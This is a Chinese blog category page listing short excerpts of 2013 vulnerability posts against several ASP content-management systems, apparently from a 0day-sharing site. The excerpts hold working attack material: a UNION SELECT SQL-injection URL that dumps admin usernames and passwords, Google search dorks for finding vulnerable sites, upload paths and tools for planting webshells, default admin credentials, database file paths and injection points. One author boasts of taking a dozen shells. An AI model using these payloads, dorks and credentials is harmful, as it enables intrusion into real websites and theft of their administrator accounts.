分类 ASP 下的文章

FoosunCms的asp版本getshell

在文件\User\award\awardAction.asp中: [php] Integral=NoSqlHack(request.QueryString("Integral"))if action="join" thenUser_Conn.execute("Insert into FS_ME_User_Prize (prizeid,usernumber,awardID) values("&...

没穿底裤 2013 年 12 月 26 日 暂无评论

某电子网Cms的0DAY

不知道是哪家的系统,后来的Google了一下。发现好像是叫什么某电子网站系统。主要漏洞还是那个动感购物的上传,一会儿就搞了十几个Shell,包括一台服务器。上传页面是: admin/upfile_flash.asp关键字:inurl:products.asp?prolenid=或者 : inurl:product.asp?smtid=利用方法很简单明小子 动感上传

没穿底裤 2013 年 12 月 14 日 暂无评论

ShopXp系统v3.xSQL注射漏洞

看到别人放出来了,那就发出来吧,没啥含量http://0day5.com/admin/pinglun.asp?id=71 UNION SELECT 1,2,admin,4,5,6,7,8,9,password,11 from shopxp_admin

没穿底裤 2013 年 12 月 11 日 暂无评论

追梦Flash网站管理系统FCMS v6.5 漏洞

Author:roker xmlEditor/adminadd.asp [php] chkuser.asp [/php] 提交 [php] Host: xxx.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.2) Gecko/20100115 Firefox/3.6 Accept: text...

没穿底裤 2013 年 12 月 09 日 6 条评论

维博天下CMS后台拿shell

from:f4ck team关键字:Powered by CNKSYS后台地址:admin 默认账号密码:admin admin拿shell方法:随便找个地方,上传一句话图片马,重命名为xx.aspps:后面小菜发现:这个程序貌似是改头换面的。。。。

没穿底裤 2013 年 12 月 08 日 暂无评论

Netin(奈特)内容管理系统漏洞

一个很冷的内容管理系统,第一次见。 后台路径:netin/Login.asp 默认用户:admin/netin 默认密码:000000/netin2009 默认数据库:#db$snetinb\#db$snetin.mdb 默认管理员表:Bs_User 注入点:http://0day5.com/shownews.asp?id=

没穿底裤 2013 年 12 月 08 日 暂无评论